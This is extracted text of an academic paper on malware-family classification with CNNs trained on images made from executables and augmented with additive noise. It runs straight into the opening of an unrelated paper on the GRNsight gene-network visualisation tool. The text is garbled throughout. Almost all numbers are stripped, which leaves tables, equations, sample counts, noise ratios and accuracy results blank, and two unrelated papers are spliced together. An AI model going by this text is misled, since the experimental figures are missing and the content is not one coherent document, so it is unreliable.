f(k; \lambda) = \Pr(X = k) = \frac{\lambda^{k} e^{-\lambda}}{k!}    ( )

where e is euler's number and k! is the factorial of k.
additive laplace
the laplace distribution is a continuous probability distribution that is sometimes described as the double exponential distribution, because it can be considered as two exponential distributions, with an extra location parameter, joined together (marks et al., ). a random variable has a laplace distribution if its probability density function is

f(x \mid \mu, b) = \frac{1}{2b} \exp\left(-\frac{|x-\mu|}{b}\right) = \frac{1}{2b} \begin{cases} \exp\left(-\frac{\mu - x}{b}\right) & \text{if } x < \mu \\ \exp\left(-\frac{x - \mu}{b}\right) & \text{if } x \ge \mu \end{cases}    ( )

malware development
malware developers try to hide the malicious code snippets they place in legitimate software from malware analysts and antivirus programs using different methods. in addition, malware developers reuse code and frameworks belonging to malware families that perform similar malicious activities, rather than rebuilding malware code fragments from scratch. for this reason, when these malware are converted into an executable file (for example, pe for windows) suitable for the target platform on which they will run, they look very similar under binary analysis. the signature-based security components used today are very vulnerable to changes in the code, which reduces their detection capabilities. developers generally use two different methods to change the malicious code content as contaminated software spreads from one host computer to another: polymorphic and metamorphic malware. in metamorphic malware, the situation is a bit more complicated. although the obfuscation techniques are applied in the same way, this time the code flow itself is changed. as seen in fig. , a typical metamorphic malware has more components and its structure is more complex.

figure : typical metamorphic malware propagation.

this time the malware has different components such as disassembler, code analyzer/permutator, code transformer, assembler, and malicious payload.

proposed approach
this section presents the data augmentation (data enhancement) based cnn malware classification algorithm. the basic idea of the augmented-cnn based malware classification technique is introduced in "basic idea". the implementation of the proposed technique is described in "implementation of the model". figure shows the flowchart of the overall method. the process of malware classification includes the following steps in the proposed solution:
- the system creates rgb images using decimal conversion, entropy conversion, and zeros.
- gaussian, poisson, and laplace noises, with their combinations, are added to the images to enhance the input dataset.
- in the third step, the system builds a cnn based classification model.

basic idea
as previously mentioned in "malware development", malware developers try to evade security components using different methods. these methods are usually in the form of adding noise to the executable file's binary form. one of the areas dealing with noisy data is the image classification task, and one of the methods used to overcome this problem and to classify images from different angles in a more reliable way is the image augmentation technique. as part of this study, malware samples have been converted to -channel images.
the evasion techniques that malware developers apply are reflected in these images as noise. we used image augmentation techniques in this study so that the noise in the images does not affect the classification performance. we used the imgaug python library for the implementation and increased our dataset to times its original size using the additivegaussian, additivelaplace and additivepoisson noise addition methods. in fig. , new images are created with different laplace noises for the trojan/win .vbkrypt.c malware. our main tasks are to enhance the data using data augmentation and to classify malware samples according to their family using a malware-image based cnn model. the basic idea of malware images is to create multi-channel images from byte streams and the entropy values of each -bit stream. table presents the notation used to evaluate the malware classifier model performance; the commonly used variables are listed for convenience.

figure: the different additive laplace noises applied to the trojan/win .vbkrypt.c malware.

table: commonly used variables and notations.
X — original input dataset
X_aug — augmented version of input dataset X
f^m_aug — augmentation function m
ε — augmentation threshold
acc — accuracy of the classifier
K — number of classes
T — number of augmentation functions

analysis of the proposed algorithm
the reasoning behind this study is the idea that, by the law of large numbers, we have the opportunity to obtain a more accurate classifier model (in this work, for malware classification) by creating new samples, compared to models created only with the original input instances.

figure: flow chart of the overall system. image conversion (red channel: decimal conversion; green channel: entropy conversion; blue channel: zeros) fills an image repository; gaussian, poisson and laplace noise are then applied to produce an enhanced image repository; the dataset with the new labels is split into training and test sets, and a cnn classifier h is built and evaluated using x_test, y_test.

in the proposed approach, there is a set of augmentation functions that acts as a data creation source for the cnn model. a single augmentation function, $f^{(m)}_{aug}$, is defined as follows:
$$X^{(m)}_{aug} = f^{(m)}_{aug}(X)$$
each augmented dataset $X^{(m)}_{aug}$, produced by the augmentation algorithm $f^{(m)}_{aug}$, is combined into a single enhanced dataset. the final augmented dataset is defined as follows:
$$X_{aug} = \bigcup_{i=1}^{T} X^{(i)}_{aug}$$
where $T$ is the number of augmented datasets and $X^{(i)}_{aug}$ is the $i$-th augmented dataset.

implementation of the model
the pseudocode for the transformation of a pe executable to multi-channel images is shown in algorithm . each member $e^{(i)}$ of the collected windows executable file set $E$ is converted to a multi-channel image in lines – . for the first channel, one byte of the executable is read and then converted to its decimal representation in line . the decimal value is assigned to the first channel of the corresponding pixel, $R(i, j, 1)$.
in the same way, the byte's entropy value is assigned to the second channel of the corresponding pixel, $R(i, j, 2)$. we used the imgaug library, which takes 3-channel png images as input, whereas we created 2-channel images in this research. since the imgaug software library requires three-channel images, we had to fill the last channel, the blue channel, with zeros. accordingly, both the time and space complexity of our algorithm are o(n).

algorithm : pe malware to image conversion
inputs: pe executable set E, image width w, image height h, channel size c
for each e(i) ∈ E do
    R ← zeros(w, h, c), where R ∈ R^{w×h×c}    ⊳ create a zero-filled matrix
    for each byte value b(j) ∈ e(i) do
        R(i, j, 1) ← decimal(b(j))    ⊳ 1st channel, with value ∈ [0, 255]
        R(i, j, 2) ← −Σ_{x∈b(j)} p(x) · log p(x)    ⊳ 2nd channel, with the entropy value
    end for
end for
outputs: image dataset X

the pseudocode of the data-augmentation enhanced cnn malware detection is shown in algorithm . the augmentation procedure is implemented by random noise assignment to each channel of the training dataset X, using a set of augmentation functions F_aug.

algorithm : data enhancement
inputs: X = {(x_i, y_i) | i = 1, …, n}, x_i ∈ R^p, y_i ∈ {−1, +1}; augmentation function set F_aug
initialize X^(i)_aug = X
for each f^(i)_aug ∈ F_aug do
    X^(i)_aug ← f^(i)_aug(X)
    X ← X ∪ X^(i)_aug
end for
outputs: enhanced dataset X

experiments
in this section, we use our public malware dataset (https://github.com/ocatak/malware_api_class), which can be accessed publicly. the malware classification model is compared with the one trained on the original dataset. in "dataset detail", we explain the dataset and the parameters that are used in our experiments. the conventional cnn is applied to the dataset and we report the classification performance in "dataset results with conventional cnn". in "dataset results with proposed method", we show the empirical results of the proposed augmented cnn training algorithm.

experimental setup
to our knowledge, there is no public benchmark dataset for the malware-images approach against which to make an evaluation comparison. we apply our dataset with different hyper-parameters to indicate the effectiveness and classification performance of the proposed model. the experiments are done using the python programming language and the machine learning libraries keras, tensorflow, and scikit-learn. we used the keras library to build the cnn networks. for the experimental setup, to generate a model that is able to generalize, we divided the dataset into two partitions: the training set with % of the dataset and the testing set with % of the dataset. the learning rate for the cnn was . .

dataset detail
we trained our classifiers with our public dataset, which is summarized in table , with seven different classes including worm, downloader, spyware, adware, exploit, malware and benign. there are , malware samples from different classes in this dataset.

table: description of the training dataset used in the experiments.
malware type — #inst.
worm — ,
downloader — ,
spyware —
adware — ,
exploit —
malware —
benign —
total — ,

the cuckoo sandbox application, as explained above, is used to obtain the windows api call sequences of the malicious software, and the virustotal service is used to detect the classes of malware. figure illustrates the system architecture used for data collection and the labeling process. our system consists of two main parts: data collection and labeling.
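as a concrete illustration of algorithm (the byte-to-image conversion) and of the imgaug-based enhancement described earlier, the sketch below converts a raw byte stream into a 3-channel array (decimal values, a simple sliding-window shannon entropy, and zeros) and then applies the three additive-noise augmenters. it is a simplified reading of the algorithm rather than the authors' released code; the image width, the entropy window size, and the noise scales are placeholder choices.

```python
import math
import numpy as np
import imgaug.augmenters as iaa

def bytes_to_image(raw: bytes, width: int = 256) -> np.ndarray:
    """algorithm 1 sketch: red = byte value, green = local entropy, blue = zeros."""
    height = math.ceil(len(raw) / width)
    img = np.zeros((height, width, 3), dtype=np.uint8)
    for idx, byte_value in enumerate(raw):
        row, col = divmod(idx, width)
        img[row, col, 0] = byte_value                      # 1st channel: decimal value in [0, 255]
        window = raw[max(0, idx - 15): idx + 1]            # small sliding window (assumed size)
        counts = np.bincount(np.frombuffer(window, dtype=np.uint8), minlength=256)
        probs = counts[counts > 0] / len(window)
        entropy = -np.sum(probs * np.log2(probs))          # shannon entropy of the window
        img[row, col, 1] = int(255 * entropy / 8.0)        # 2nd channel: entropy scaled to [0, 255]
    return img                                             # 3rd (blue) channel stays zero

# a toy "executable" byte stream and the three additive-noise augmenters named in the text
sample = bytes(range(256)) * 4
image = bytes_to_image(sample)
augmenters = [
    iaa.AdditiveGaussianNoise(scale=10),
    iaa.AdditiveLaplaceNoise(scale=10),
    iaa.AdditivePoissonNoise(lam=5),
]
augmented_images = [aug.augment_image(image) for aug in augmenters]
```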
evaluation
although the dataset that is applied in our method is almost balanced, performance evaluation in terms of traditional accuracy alone is not sufficient to obtain an optimal classifier. therefore, we apply four metrics, namely the overall prediction accuracy, average recall, average precision (turpin & scholer, ) and the f1-score, to estimate the classification accuracy; these are commonly used measurement metrics in machine learning (manning, raghavan & schütze, ; makhoul et al., ).

precision is the ratio of correctly predicted positive classes to all positive predictions. precision is estimated in eq. ( ):
$$\mathrm{precision} = \frac{\mathrm{correct}}{\mathrm{correct} + \mathrm{false}}$$
recall is the ratio of correctly predicted positive classes to the sum of correct positive estimations and false negatives. it can also be called sensitivity. recall is given in eq. ( ):
$$\mathrm{recall} = \frac{\mathrm{correct}}{\mathrm{correct} + \mathrm{missed}}$$
first, our evaluation estimates precision and recall for each class and then calculates their mean. in eqs. ( ) and ( ), we present the average precision and recall:
$$\mathrm{precision}_{avg} = \frac{1}{n_{classes}} \sum_{i=0}^{n_{classes}-1} \left( \mathrm{prec}_i \times \mathrm{num\_of\_instances}_i \right)$$
$$\mathrm{recall}_{avg} = \frac{1}{n_{classes}} \sum_{i=0}^{n_{classes}-1} \left( \mathrm{recall}_i \times \mathrm{num\_of\_instances}_i \right)$$
the average precision and recall values are calculated by multiplying the per-class precision or recall by the number of instances in the corresponding class. precision and recall are evaluated together in the f-measure, which is the harmonic mean of precision and recall. the f-measure is provided in eq. ( ):
$$F_1 = \frac{2 \times \mathrm{prec}_{avg} \times \mathrm{recall}_{avg}}{\mathrm{prec}_{avg} + \mathrm{recall}_{avg}}$$

figure: general system architecture. the architecture consists of three parts: data collection, data pre-processing and data classification.

dataset results with conventional cnn
figure presents the accuracy performance of the conventional cnn model for our experimental data set. as shown in the figure, the model reaches its steady state after the th epoch. also, fig. shows the loss value changes of the classification model through the epochs.

figure: accuracy changes over learning iterations. although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together with it.

figure: loss changes over learning iterations. although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together with it, as in fig. .

a confusion matrix is applied to evaluate the performance of our model. fig. shows the confusion matrix of the cnn model that was trained using the original dataset.

figure: the confusion matrix of the cnn model, which was trained using the original dataset.
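the averaged metrics defined above can be computed from per-class predictions in a few lines; the sketch below uses scikit-learn (which the experimental setup lists among the libraries used) with made-up label vectors, and the support-weighted averaging mode shown here is one common aggregation choice, not necessarily the authors' exact implementation.

```python
import numpy as np
from sklearn.metrics import accuracy_score, precision_recall_fscore_support

classes = ["worm", "downloader", "spyware", "adware", "exploit", "malware", "benign"]

# toy ground-truth / prediction vectors standing in for the cnn outputs
y_true = np.array([0, 1, 2, 3, 4, 5, 6, 0, 1, 2])
y_pred = np.array([0, 1, 2, 3, 4, 5, 6, 1, 1, 0])

# per-class precision, recall and f1
prec, rec, f1, support = precision_recall_fscore_support(
    y_true, y_pred, labels=list(range(len(classes))), zero_division=0
)
for name, p, r, f, n in zip(classes, prec, rec, f1, support):
    print(f"{name:12s} precision={p:.2f} recall={r:.2f} f1={f:.2f} (n={n})")

# overall accuracy plus support-weighted averages of the per-class scores
print("accuracy:", accuracy_score(y_true, y_pred))
avg_prec, avg_rec, avg_f1, _ = precision_recall_fscore_support(
    y_true, y_pred, average="weighted", zero_division=0
)
print(f"weighted precision={avg_prec:.2f} recall={avg_rec:.2f} f1={avg_f1:.2f}")
```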
the findings of the confusion matrix indicate that the classification model performance is not good enough for the malware detection. the testing classification performance is measured through accuracy, precision, recall and f measure. table shows the best performance of the conventional cnn method of each malware family. as can be seen from the confusion matrix and classification report, the classification performance of the model obtained with conventional cnn is rather low. according to these results, a standard cnn model with rgb type -channel image training dataset is not suitable for malware detection and classification. dataset results with proposed method figure shows the accuracy change in each iteration of the cnn model, which is trained with the malware dataset containing a different amount of noise. the performance results of four cnn models, whose dataset is enriched by using both additive laplace, additive gaussian, and additive poisson methods, are better than the cnn model’s classification performance that is trained only with the original training data set. when the noise ratio is . , the original cnn model’s classification result is better than the cnn model with the additive poisson method. when the noise ratio is increased to . , the classification results of cnn models with additive gaussian, additive laplace, and additive poisson begin to decrease. figure shows the accuracy change in each iteration of the cnn model, which is trained with the malware dataset containing a different amount of noise with different combination of noise models. the performance results of five cnn models, whose dataset is enriched by using combination of additive laplace, additive gaussian and additive poisson methods, are better than the cnn model’s classification performance that is trained only with the original training data set. when the noise ratio is . , the original table classification report of conventional cnn for each malware class. precision recall f worm . . . downloader . . . dropper . . . spyware . . . adware . . . exploit . . . malware . . . benign . . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cnn model’s classification result is better than the cnn model with the several combination of noise injection methods. table shows the accuracy changes with different noise methods and different noise ratio. the fields shown as bold on the table show the best accuracy value of the column. the best accuracy value for poisson noise is obtained with . and . noise ratio, the best accuracy value for gaussian noise is obtained with . and . noise ratio, and the best accuracy value for laplace noise is obtained with . and . noise ratio. according to the table, we obtain the best classification performance with the gaussian noise’s . noise ratio. figure the different noise ratio accuracy results for additive laplace/gaussian/poisson and original cnn model’s accuracy results. noise scale: (a) . ; (b) . ; (c) . ; (d) . ; (e) . and (f) . . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows the accuracy changes with the different combination of noise methods and different noise ratio. the fields shown as bold on the table show the best accuracy value of the column. the best accuracy value for poisson/gaussian noise is obtained with . and . 
noise ratio, the best accuracy value for poisson/laplace noise is obtained figure the different noise ratio accuracy results for the combination of additive laplace/ gaussian/poisson and original cnn model’s accuracy results. noise scale: (a) . ; (b) . ; (c) . ; (d) . ; (e) . and (f) . . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with . and . noise ratio, the best accuracy value for laplace/gaussian noise is obtained with . and . noise ratio. the best classification performance is performed by using the poisson noise with . value has a % classification performance. figure shows the confusion matrix of the malware detection model with the best classification performance. table noise injection accuracy results. the bold entries show the best values. noise ratio orginal model poission gaussian laplace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure the confusion matrix of the cnn model with best data noise injection ratio. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion and future work the primary purpose of this research study is to detect malware families in a metamorphic malware environment using an image augmentation enhanced deep cnn model. the architecture of the model consists of three main components: image generation from malware samples, image augmentation, and classifying the malware families by using cnn models. in the first component, the collected malware samples are converted into binary representation using the windowing technique. the imgaug python library is used to apply image augmentation techniques in the second component. the dataset is enhanced using additive noise techniques such as gaussian, laplacian, and poisson. we apply it to our dataset with different hyper-parameters to demonstrate the proposed model’s effectiveness and classification performance. finally, we train our classifier on our public dataset with seven different classes, including worm, downloader, spyware, adware, exploit, malware and benign. the model reaches its steady-state after the th epoch. we observe that the training dataset shows more stable progress as compared to the test dataset, although both progress together. we apply four different metrics to evaluate the classification accuracy, such as the overall prediction accuracy, average recall, average precision and f -score. the confusion matrix results indicate that the classification model performance is not good enough for malware detection. the classification performance of the model obtained with conventional cnn is relatively low. according to these results, a standard cnn model with an rgb type -channel image training dataset is not suitable for malware detection and classification. the augmentation is measured with varying noise ratio to assess the effectiveness of the learning algorithm. this article’s main contribution is to propose a data augmentation enhanced malware family classification model that exploits augmentation for variants of malware clones and takes advantage of cnn to improve image classification. it is evident from the results of this research that the data augmentation based on -channel image classification can significantly influence the performance of malware family classification. 
in future work, we intend to classify the correctly labeled dataset using the malware images method. we also plan to apply other sequential data classification algorithms used before deep learning. table the best accuracy rates for the combination of each noise type. the bold entries show the best accuracy values. noise org poisson/gaussian poisson/laplace laplace/gaussian all . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ferhat ozgur catak conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � javed ahmed conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � kevser sahinbas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � zahid hussain khand conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/ocatak/malware_api_class references catak fo, yazı af. . a benchmark api call dataset for windows pe malware classification. arxiv preprint arxiv: . . catak fo, yazı af, elezaj o, ahmed j. . deep learning based sequential model for malware analysis using windows exe api calls. peerj computer science :e . chen b, ren z, yu c, hussain i, liu j. . adversarial examples for cnn-based malware detectors. ieee access : – . cui z, xue f, cai x, cao y, wang g, chen j. . detection of malicious code variants based on deep learning. ieee transactions on industrial informatics ( ): – . dai y, li h, qian y, lu x. . a malware classification method based on memory dump grayscale image. digital investigation : – . fu j, xue j, wang y, liu z, shan c. . malware visualization for fine-grained classification. ieee access : – . gibert d, mateu c, planes j, vicens r. . using convolutional neural networks for classification of malware represented as images. journal of computer virology and hacking techniques ( ): – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ harmsen jj, pearlman wa. . steganalysis of additive-noise modelable information hiding. in: security and watermarking of multimedia contents v. vol. .. bellingham, washington: international society for optics and photonics, – . hida t, si s. . lectures on white noise functionals. singapore: world scientific. holmstrom l, koistinen p. . using additive noise in back-propagation training. ieee transactions on neural networks ( ): – . kancherla k, mukkamala s. . image visualization based malware detection. in: ieee symposium on computational intelligence in cyber security (cics). piscataway: ieee, – . 
kosmidis k, kalloniatis c. . machine learning and images for malware detection and classification. in: proceedings of the st pan-hellenic conference on informatics, pci . new york: association for computing machinery. liu y, lai y, wang z, yan h. . a new learning approach to malware classification using discriminative feature extraction. ieee access : – . makandar a, patrot a. . malware class recognition using image processing techniques. in: international conference on data management, analytics and innovation (icdmai). – . makhoul j, kubala f, schwartz r, weischedel r. . performance measures for information extraction. in: proceedings of darpa broadcast news workshop, – . manning cd, raghavan p, schütze h. . introduction to information retrieval. new york: cambridge university press. marks rj, wise gl, haldeman dg, whited jl. . detection in laplace noise. ieee transactions on aerospace electronic systems ( ): – doi . /taes. . . mira f. . a review paper of malware detection using api call sequences. in: nd international conference on computer applications information security (iccais). – . nataraj l, karthikeyan s, jacob g, manjunath bs. . malware images: visualization and automatic classification. in: proceedings of the th international symposium on visualization for cyber security, vizsec’ . new york: association for computing machinery. ni s, qian q, zhang r. . malware identification using visualization images and deep learning. computers & security : – doi . /j.cose. . . . nisa m, shah jh, kanwal s, raza m, khan ma, damaševicius r, blažauskas t. . hybrid malware classification method using segmentation-based fractal texture analysis and deep convolution neural network features. applied sciences ( ): . selesnick iw. . the estimation of laplace random vectors in additive white gaussian noise. ieee transactions on signal processing ( ): – doi . /tsp. . . shamshirband s, chronopoulos at. . a new malware detection system using a high performance-elm method. in: proceedings of the rd international database applications and engineering symposium, ideas ’ . new york: association for computing machinery. shamshirband s, fathi m, chronopoulos at, montieri a, palumbo f, pescape a. . computational intelligence intrusion detection techniques in mobile cloud computing environments: review, taxonomy, and open research issues. journal of information security and applications : doi . /j.jisa. . . tobiyama s, yamaguchi y, shimada h, ikuse t, yagi t. . malware detection with deep neural network using process behavior. in: ieee th annual computer software and applications conference (compsac). piscataway: ieee, – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /taes. . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /j.jisa. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ turpin a, scholer f. . user performance versus precision measures for simple search tasks. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – . venkatraman s, alazab m, vinayakumar r. . a hybrid deep learning image-based analysis for effective malware detection. journal of information security and applications : – doi . /j.jisa. . . . wojtkiewicz sf, johnson ea, bergman la, grigoriu m, spencer bf. . 
response of stochastic dynamical systems driven by additive gaussian and poisson white noise: solution of a forward generalized kolmogorov equation by a spectral finite difference method. computer methods in applied mechanics and engineering ( ): – doi . /s - ( ) -x. yakura h, shinozaki s, nishimura r, oyama y, sakuma j. . malware analysis of imaged binary samples by convolutional neural network with attention mechanism. in: proceedings of the eighth acm conference on data and application security and privacy, codaspy' . new york: acm, – . yan j, qi y, rao q. . detecting malware with an ensemble method based on deep neural network. security and communication networks ( ): – doi . / / . yazı af, catak fo, gul e. . classification of methamorphic malware with deep learning (lstm). in: th signal processing and communications applications conference (siu). – . yoo s, kim s, kang bb. . the image game: exploit kit detection based on recursive convolutional neural networks. ieee access : – doi . /access. . . yue s. . imbalanced malware images classification: a cnn based approach. arxiv preprint arxiv: . . zhang j, qin z, yin h, ou l, hu y. . irmd: malware variant detection using opcode image recognition. in: ieee nd international conference on parallel and distributed systems (icpads). piscataway: ieee, – .
grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks
kam d. dahlquist, john david n. dionisio, ben g. fitzpatrick, nicole a. anguiano, anindita varshneya, britain j. southwick and mihir samdarshi
department of biology, loyola marymount university, los angeles, california, united states
department of electrical engineering and computer science, loyola marymount university, los angeles, california, united states
department of mathematics, loyola marymount university, los angeles, california, united states
abstract
grnsight is a web application and service for visualizing models of gene regulatory networks (grns). a gene regulatory network (grn) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mrna and protein from genes. the original motivation came from our efforts to perform parameter estimation and forward simulation of the dynamics of a differential equations model of a small grn with nodes and edges. we wanted a quick and easy way to visualize the weight parameters from the model which represent the direction and magnitude of the influence of a transcription factor on its target gene, so we created grnsight. grnsight automatically lays out either an unweighted or weighted network graph based on an excel spreadsheet containing an adjacency matrix where regulators are named in the columns and target genes in the rows, a simple interaction format (sif) text file, or a graphml xml file. when a user uploads an input file specifying an unweighted network, grnsight automatically lays out the graph using black lines and pointed arrowheads. for a weighted network, grnsight uses pointed and blunt arrowheads, and colors the edges and adjusts their thicknesses based on the sign (positive for activation or negative for repression) and magnitude of the weight parameter. grnsight is written in javascript, with diagrams facilitated by d .js, a data visualization library. node.js and the express framework handle server-side functions. grnsight's diagrams are based on d .js's force graph layout algorithm, which was then extensively customized to support the specific needs of grns. nodes are rectangular and support gene labels of up to characters.
the edges are arcs, which become straight lines when the nodes are close together. self-regulatory edges are indicated by a loop. when a user mouses over an edge, the numerical value of the weight parameter is displayed. visualizations can be modified by sliders that adjust the force graph layout parameters and through manual node dragging. grnsight is best-suited for visualizing networks of fewer than nodes and edges, although it accepts networks of up to nodes or edges. grnsight has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. grnsight serves as an example of following and teaching best practices for scientific computing and complying with fair principles, using an open and test-driven development model how to cite this article dahlquist et al. ( ), grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted august published september corresponding author kam d. dahlquist, kdahlquist@lmu.edu academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright dahlquist et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kdahlquist@�lmu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ with rigorous documentation of requirements and issues on github. an exhaustive unit testing framework using mocha and the chai assertion library consists of around automated unit tests that examine nearly test files to ensure that the program is running as expected. the grnsight application (http://dondi.github.io/ grnsight/) and code (https://github.com/dondi/grnsight) are available under the open source bsd license. subjects bioinformatics, graphics, software engineering keywords gene regulatory networks, visualization, web application, web service, automatic graph layout, best practices for scientific computing, fair principles, open source, open development introduction grnsight is a web application and service for visualizing models of small- to medium- scale gene regulatory networks (grns). a gene regulatory network (grn) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mrna and protein from genes. our group has developed a matlab program to perform parameter estimation and forward simulation of the dynamics of an ordinary differential equations model of a medium-scale grn with nodes and edges (dahlquist et al., ; http://kdahlquist.github.io/grnmap/). grnmap accepts a microsoft excel workbook as input, with multiple worksheets specifying the different types of data needed to run the model. for compactness, the grn itself is specified by a worksheet that contains an adjacency matrix where regulators are named in the columns and target genes in the rows. each cell in the matrix contains a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them. 
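as a small, purely illustrative sketch of the adjacency-matrix format just described (regulators named in the columns, target genes in the rows, with 1 marking a regulatory relationship and 0 marking none), the python/pandas snippet below writes such a matrix to an excel workbook. the gene names, the 0/1 entries, and the worksheet name are example values only; this is not part of grnmap or grnsight itself.

```python
import pandas as pd

# rows = target genes, columns = regulators; 1 = regulatory relationship, 0 = none
genes = ["GeneA", "GeneB", "GeneC", "GeneD"]      # made-up example gene names
matrix = [
    [1, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 1, 0, 1],
    [1, 0, 0, 0],
]
network = pd.DataFrame(matrix, index=genes, columns=genes)

# write the adjacency matrix to a worksheet of an .xlsx workbook
# ("network" is used here as an example worksheet name)
with pd.ExcelWriter("example_grn.xlsx", engine="openpyxl") as writer:
    network.to_excel(writer, sheet_name="network")
```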
the grnmap program then outputs the estimated weight parameters in a new worksheet containing an adjacency matrix where the “ ’s” are replaced with a real number that is the weight parameter, representing the direction (positive for activation or negative for repression) and magnitude of the influence of the transcription factor on its target gene (dahlquist et al., ). although matlab has graph layout capabilities, we wanted a way for novice and experienced biologists alike to quickly and easily view the unweighted and weighted network graphs corresponding to the matrix without having to create or modify matlab code. given that our user base included students in courses using university computer labs where the installation and maintenance of software is subject to logistical considerations sometimes beyond our control, we enumerated the following requirements for a potential visualization tool. the tool should: . exist as a web application without the need to download and install specialized software; . be simple and intuitive to use; . accept an input file in microsoft excel format (.xlsx); . read a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows; dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dondi.github.io/grnsight/ http://dondi.github.io/grnsight/ https://github.com/dondi/grnsight http://kdahlquist.github.io/grnmap/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . automatically lay out and display small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists and adds value to the interpretation of the modeling results. having established the broad technical requirements to which we were seeking a solution, the first task was to determine if software already existed that could fulfill our needs. a review by pavlopoulos et al. ( ), describes the types, trends, and usage of visualization tools available for genomics and systems biology. their list of tools for network analysis is representative of what was available to us at our project inception in january (given the caveat that the list itself is a moving target with some tools dropping out, new ones being added, and others evolving in their functions). with such a large number of tools available, it would be reasonable to expect that one already existed that could fulfill our needs. however, our use case was narrow, and the tools we investigated out of this diverse set each had properties that limited their use for us. with regard to our first requirement, out of the tools, are stand-alone applications, requiring installation, versus web applications. with respect to our second requirement, the more complex software packages out of the set have a steep learning curve. our third and fourth requirements specify data types. some packages were hardcoded for a different type of network than a grn (e.g., metabolic or signaling pathways, protein-protein interaction networks) or retrieved data exclusively from a backend database, not allowing user-supplied data. none at the time would readily accept an adjacency matrix with the grnmap specifications as input without some manipulation of the data format. finally, with respect to the last requirement, the core functionality, some packages were designed for visualization and analysis of much larger networks than the ones in which we were interested or did not have the ability to display directed, weighted graphs. 
as an illustration of this, pavlopoulos et al. ( ) showed that the open source software, cytoscape (shannon et al., ; smoot et al., ) had the highest citation count in the scopus database, as it is widely recognized as the “best-in-class” tool for viewing and analyzing large networks for systems biology research. however, while cytoscape is flexible in terms of what types of network representations it accepts as input (sif, nnf, gml, xgmml, sbml, biopax, psi-mi, graphml, cf. http:// manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported- network-file-formats), its basic “unformatted table files” format expects the network to be represented in a list of pairwise interactions between two nodes instead of as an adjacency matrix, requiring a grnmap user to convert the file external to the program. furthermore, cytoscape must be installed on a user’s computer. finally, because it is powerful and has a lot of features, there is a somewhat steep learning curve before a novice user can begin to visualize networks. multiple settings must be learned and selected to generate a display that properly fits a use case; it is not possible to just “load into cytoscape and go.” another open source application, gephi (bastian, heymann & jacomy, ), is a general graph visualization tool that does accept an adjacency matrix in .csv format (among a wide range of supported formats, dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cf. https://gephi.org/users/supported-graph-formats/csv-format/), but again requires download and installation of the software and has a complex feature set. because grnmap itself is complex software targeted both at experienced biology investigators and novice undergraduate users in a biomathematical modeling course, we wanted to limit the need to install and learn additional visualization software. reducing the cognitive load required for using the software would allow users to focus their attention on understanding the biological results of the model. after this exploration, we decided to create our own software solution that we could exactly tailor to our specifications. following the philosophy of “do one thing well” (http://onethingwell.org/post/ /about-one-thing-well), we wanted to prioritize rendering small- to medium-scale grns both easily and well. it was more important for us to create a tool that is specifically tailored to the visualization of these sized grns, and not every possible graph from every possible application domain. similarly, we wanted to pass data seamlessly from grnmap to grnsight, while bearing in mind that we should adopt practices that would also make our tool useful to users outside our own group. 